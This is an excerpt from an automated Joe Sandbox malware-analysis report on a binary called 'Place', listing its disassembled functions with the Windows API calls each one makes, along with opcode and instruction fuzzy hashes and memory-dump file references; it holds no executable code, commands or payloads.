Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 137f221b12cb5c4068cfd597c057d53ca687993f24fd4c164e3d4310ffd8a1e0
Instruction ID: d27be514ddd5d60a91e401bc86998bd08357457cff35f93276d1830749199116
Opcode Fuzzy Hash: 137f221b12cb5c4068cfd597c057d53ca687993f24fd4c164e3d4310ffd8a1e0
Instruction Fuzzy Hash: 00318F721412147FEF154F50CC4AFEB3BAEEB49761F088056FE089A291C6B59C91CBB0

Function 005DC748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 005DC75D
_memcmp.LIBCMT ref: 005DC77F
_memcmp.LIBCMT ref: 005DC797
_memcmp.LIBCMT ref: 005DC7AA
_memcmp.LIBCMT ref: 005DC7C4
_memcmp.LIBCMT ref: 005DC7D7
_memcmp.LIBCMT ref: 005DC7EF
_memcmp.LIBCMT ref: 005DC80A

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: daeb9a2e211cd08f74d6ce66df24f84f86b7c4b32777d4937bfafc8490218c24
Instruction ID: e709a8fda8391ab734d93c9029e228cd59c3f7f8b30ba44c782b1e7f38a904d1
Opcode Fuzzy Hash: daeb9a2e211cd08f74d6ce66df24f84f86b7c4b32777d4937bfafc8490218c24
Instruction Fuzzy Hash: 7421C4726445177A9A2475288E46FAF3F5DFE51744F08402BFD02A7742E710DE11C6E5

Function 005EF166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00584D37: __itow.LIBCMT ref: 00584D62
Part of subcall function 00584D37: __swprintf.LIBCMT ref: 00584DAC

Part of subcall function 0059436A: _wcscpy.LIBCMT ref: 0059438D

_wcstok.LIBCMT ref: 005EF2D7
_wcscpy.LIBCMT ref: 005EF366
_memset.LIBCMT ref: 005EF399

Strings

X, xrefs: 005EF3D6

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: d2d3453a2990b7f6dab59d10bebc25f393013ff046bbe2fa766211f0a827f5ab
Instruction ID: 33faadce2be7daa234612c42319bdd8dbbcb832a47326b6eeabe2c838807c5c4
Opcode Fuzzy Hash: d2d3453a2990b7f6dab59d10bebc25f393013ff046bbe2fa766211f0a827f5ab
Instruction Fuzzy Hash: 20C17E755047929FCB18EF64C849A5EBBE4BF85350F40492DF8D9972A2EB30EC45CB82

Function 005F71EE Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 005F72EB
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 005F730C
WSAGetLastError.WSOCK32(00000000), ref: 005F731F
htons.WSOCK32(?,?,?,00000000,?), ref: 005F73D5
inet_ntoa.WSOCK32(?), ref: 005F7392

Part of subcall function 005DB4EA: _strlen.LIBCMT ref: 005DB4F4
Part of subcall function 005DB4EA: _memmove.LIBCMT ref: 005DB516

_strlen.LIBCMT ref: 005F742F
_memmove.LIBCMT ref: 005F7498

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 29f6e2edff103d6bde505b5f9344dfcbf89d10447f5272ca98a533c791f9a5b9
Instruction ID: 4564ce64b7fb214b9042321ff0a5ec6f1840931fd9d1747c2781c0a4e6fe28cb
Opcode Fuzzy Hash: 29f6e2edff103d6bde505b5f9344dfcbf89d10447f5272ca98a533c791f9a5b9
Instruction Fuzzy Hash: 7E81F67110820AABD710EB24CC89E6BBFA9FFC8710F14491DFA559B292EB74DD01CB91

Function 00581800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87a5d54faa76af17be0ccce2376ad8335954590fc12b9308e217960e19659a7e
Instruction ID: 39528c8e1a67052730d212277cbdb036297d2b9286b9876dbd26d412153027ec
Opcode Fuzzy Hash: 87a5d54faa76af17be0ccce2376ad8335954590fc12b9308e217960e19659a7e
Instruction Fuzzy Hash: 81716C70900509EFDB04DF98CC8AAEEBF79FF86310F148159F915AA251C774AA52CFA4

Function 0060B9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00FD52E8), ref: 0060BA5D
IsWindowEnabled.USER32(00FD52E8), ref: 0060BA69
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0060BB4D
SendMessageW.USER32(00FD52E8,000000B0,?,?), ref: 0060BB84
IsDlgButtonChecked.USER32(?,?), ref: 0060BBC1
GetWindowLongW.USER32(00FD52E8,000000EC), ref: 0060BBE3
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0060BBFB

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 9fecd919f5bc134bea9f8b3b64253bbac9bda7e0793bc3236652708cd6befac6
Instruction ID: 050599e39407191dafe32e91a1ad5184ce097591ba8689ce82e74b73bfd799f0
Opcode Fuzzy Hash: 9fecd919f5bc134bea9f8b3b64253bbac9bda7e0793bc3236652708cd6befac6
Instruction Fuzzy Hash: 2E71AE34684205AFEB289F54C894FFBBBA7EF49300F14A459F94697391CB31AC51DB60

Function 005FFB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005FFB31
_memset.LIBCMT ref: 005FFBFA
ShellExecuteExW.SHELL32(?), ref: 005FFC3F

Part of subcall function 00584D37: __itow.LIBCMT ref: 00584D62
Part of subcall function 00584D37: __swprintf.LIBCMT ref: 00584DAC

Part of subcall function 0059436A: _wcscpy.LIBCMT ref: 0059438D

GetProcessId.KERNEL32(00000000), ref: 005FFCB6
CloseHandle.KERNEL32(00000000), ref: 005FFCE5

Strings

@, xrefs: 005FFC0E

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 745008556a599001b0c91590e2a616d8565abcc6e138479954e0cdc0be0f5978
Instruction ID: 467201a3f3e62535f1d3c55007ee60c2e43f0284a66c88f8b7a4763d6d46d0cd
Opcode Fuzzy Hash: 745008556a599001b0c91590e2a616d8565abcc6e138479954e0cdc0be0f5978
Instruction Fuzzy Hash: CA61BB75A0061A9FCB10EFA4C4999AEBBF5FF88310B148469E906AB751DB34AD41CF90

Function 005E174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 005E178B
GetKeyboardState.USER32(?), ref: 005E17A0
SetKeyboardState.USER32(?), ref: 005E1801
PostMessageW.USER32(?,00000101,00000010,?), ref: 005E182F
PostMessageW.USER32(?,00000101,00000011,?), ref: 005E184E
PostMessageW.USER32(?,00000101,00000012,?), ref: 005E1894
PostMessageW.USER32(?,00000101,0000005B,?), ref: 005E18B7

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 9953548fc73d9dfed137e26bba0354a732796a26490b4a859d0b3888ada95560
Instruction ID: 09a871ea0bc1c04f3f5d2f6bc64f61aabe015cf927402869ac5d9f5c65a377f8
Opcode Fuzzy Hash: 9953548fc73d9dfed137e26bba0354a732796a26490b4a859d0b3888ada95560
Instruction Fuzzy Hash: A751C2B0A08BD53DFB3A47268855BBA7EE97B06700F0C8589E0D9968C3C2F89CD4D754

Function 005E1565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 005E15A4
GetKeyboardState.USER32(?), ref: 005E15B9
SetKeyboardState.USER32(?), ref: 005E161A
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 005E1646
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 005E1663
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 005E16A7
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 005E16C8

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 40b92caa85ec975767bff968631866e1381f814619caea417c215eb3615afcd8
Instruction ID: 032aec9654b64dfe2c0968efff3f2c240107a8b34c768c7ce67aa83981e40c6d
Opcode Fuzzy Hash: 40b92caa85ec975767bff968631866e1381f814619caea417c215eb3615afcd8
Instruction Fuzzy Hash: 65510AB0504BD53DFB3A8735CC45BBA7EA97B45300F0C858AE0D5468C2C6B4EC94DB58

Function 005E5BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 005E5BC5
_wcsncpy.LIBCMT ref: 005E5BFA
_wcsncpy.LIBCMT ref: 005E5C2C
_wcsncpy.LIBCMT ref: 005E5C5F
_wcsncpy.LIBCMT ref: 005E5CA1
_wcsncpy.LIBCMT ref: 005E5CDB
_wcsncpy.LIBCMT ref: 005E5D0A

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: cba1121ed5b2de6b81b47057c7c4e8e318c2a946ff8925d73393d33c6ff64fde
Instruction ID: a58ec6fc7bb30096a3da38c3b7416507cf4d88e4a97261ba2186afff1c363b9e
Opcode Fuzzy Hash: cba1121ed5b2de6b81b47057c7c4e8e318c2a946ff8925d73393d33c6ff64fde
Instruction Fuzzy Hash: DF41CDA6C2065975CB11EBF48C4AACFBBBCBF46310F509852F909E3122F634A71587A5

Function 005E3B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 005E4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,005E3B8A,?), ref: 005E4BE0

Part of subcall function 005E4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,005E3B8A,?), ref: 005E4BF9

lstrcmpiW.KERNEL32(?,?), ref: 005E3BAA
_wcscmp.LIBCMT ref: 005E3BC6
MoveFileW.KERNEL32(?,?), ref: 005E3BDE
_wcscat.LIBCMT ref: 005E3C26
SHFileOperationW.SHELL32(?), ref: 005E3C92

Strings

\*.*, xrefs: 005E3C20

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 772312397fbb915309054d40c2e5de4a3b797ee3659a7def33994facc48ab0df
Instruction ID: be21fc25b56d43409309e66d1c0440db5978b157794a760c2ef92b345d353c8b
Opcode Fuzzy Hash: 772312397fbb915309054d40c2e5de4a3b797ee3659a7def33994facc48ab0df
Instruction Fuzzy Hash: 95418D714083859ACB56EB65C489ADFBBECBF89340F50592EF4CAC3151EB34D688CB52

Function 006078B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006078CF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00607976
IsMenu.USER32(?), ref: 0060798E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006079D6
DrawMenuBar.USER32 ref: 006079E9

Strings

0, xrefs: 006078C3

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 1b454cb78e33de62cb61983e99b1e1d5e2306610928fea22b433b86a250b4737
Instruction ID: 950015883bc3a73d1e0af162d7c867c4fa7e79534453f0c5390a7acf1d04bf33
Opcode Fuzzy Hash: 1b454cb78e33de62cb61983e99b1e1d5e2306610928fea22b433b86a250b4737
Instruction Fuzzy Hash: 5A412575A48209EFDB24DF54D884AEABBBAFB09310F048129F955A7390C770AD50CFA0

Function 00601602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00601631
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0060165B
FreeLibrary.KERNEL32(00000000), ref: 00601712

Part of subcall function 00601602: RegCloseKey.ADVAPI32(?), ref: 00601678
Part of subcall function 00601602: FreeLibrary.KERNEL32(?), ref: 006016CA
Part of subcall function 00601602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 006016ED

RegDeleteKeyW.ADVAPI32(?,?), ref: 006016B5

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 598fdbeb0fc7f1d722d6de59505ccf06b415fd3e1539e66965502ee482bd9709
Instruction ID: 145b251d18538ef1134449a56b3f3abda6e7305f3dbe44af2d34d10788b9466d
Opcode Fuzzy Hash: 598fdbeb0fc7f1d722d6de59505ccf06b415fd3e1539e66965502ee482bd9709
Instruction Fuzzy Hash: 40313C71940109BFEB198F90DC89AFFB7BDEF09301F04416AF501A6290EA759E859AA4

Function 006068F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00606911
GetWindowLongW.USER32(00FD52E8,000000F0), ref: 00606944
GetWindowLongW.USER32(00FD52E8,000000F0), ref: 00606979
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 006069AB
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 006069D5
GetWindowLongW.USER32(?,000000F0), ref: 006069E6
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00606A00

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 2370971edf10eb2173e73a36997c72dfa5c50e3cb62060a9a76061f07f1473db
Instruction ID: b362ad51b17af79c296c297b422251ff47f5742dc1bb197b6874468b278d49e5
Opcode Fuzzy Hash: 2370971edf10eb2173e73a36997c72dfa5c50e3cb62060a9a76061f07f1473db
Instruction Fuzzy Hash: 7E3137346841569FEB24CF58DC88FA637E2EB4A351F1851A5F5048B6F2CBB1AC60DB90

Function 005DE287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005DE2CA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005DE2F0
SysAllocString.OLEAUT32(00000000), ref: 005DE2F3
SysAllocString.OLEAUT32(?), ref: 005DE311
SysFreeString.OLEAUT32(?), ref: 005DE31A
StringFromGUID2.OLE32(?,?,00000028), ref: 005DE33F
SysAllocString.OLEAUT32(?), ref: 005DE34D

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: ddd970c771602483a52caf92d387556570f37a9d00aca686a050848004a33419
Instruction ID: aaafe136ec1901d9462cfd32bda832d3e089fa61c2b3faaa045e981d88e77872
Opcode Fuzzy Hash: ddd970c771602483a52caf92d387556570f37a9d00aca686a050848004a33419
Instruction Fuzzy Hash: E5214675604219AFAF20EFA8DC89CBE77ADFB09360B448527F914DB250D670ED858760

Function 005F685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 005F8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 005F84A0

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 005F68B1
WSAGetLastError.WSOCK32(00000000), ref: 005F68C0
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 005F68F9
connect.WSOCK32(00000000,?,00000010), ref: 005F6902
WSAGetLastError.WSOCK32 ref: 005F690C
closesocket.WSOCK32(00000000), ref: 005F6935
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 005F694E

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: d8f07e40bea14b437250d2217bd76ce10c4be96a14ffa9798d0cc48411f46584
Instruction ID: 3a0039d6ce4e51f7651ea81280540d83744b3f29e0925b76f1de5c0f17266737
Opcode Fuzzy Hash: d8f07e40bea14b437250d2217bd76ce10c4be96a14ffa9798d0cc48411f46584
Instruction Fuzzy Hash: F031A771600119AFEF10AF64CC89BBD7BE9FB44765F048019FE05EB291DBB4AC458BA1

Function 005DE360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005DE3A5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005DE3CB
SysAllocString.OLEAUT32(00000000), ref: 005DE3CE
SysAllocString.OLEAUT32 ref: 005DE3EF
SysFreeString.OLEAUT32 ref: 005DE3F8
StringFromGUID2.OLE32(?,?,00000028), ref: 005DE412
SysAllocString.OLEAUT32(?), ref: 005DE420

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: e2163ea199c26ff40f7b922de5ffd421b434fbbb87d9324acbe7b38ebd209ed1
Instruction ID: 63d472f6bbecf9335a511dd350114c47fba7799cb92ce497e3c5cdc18b02af4e
Opcode Fuzzy Hash: e2163ea199c26ff40f7b922de5ffd421b434fbbb87d9324acbe7b38ebd209ed1
Instruction Fuzzy Hash: BF214735604105AFEF60AFACDC89DAE7BECFB49360B448527F915CB260D674EC818764

Function 00607BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00582111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0058214F
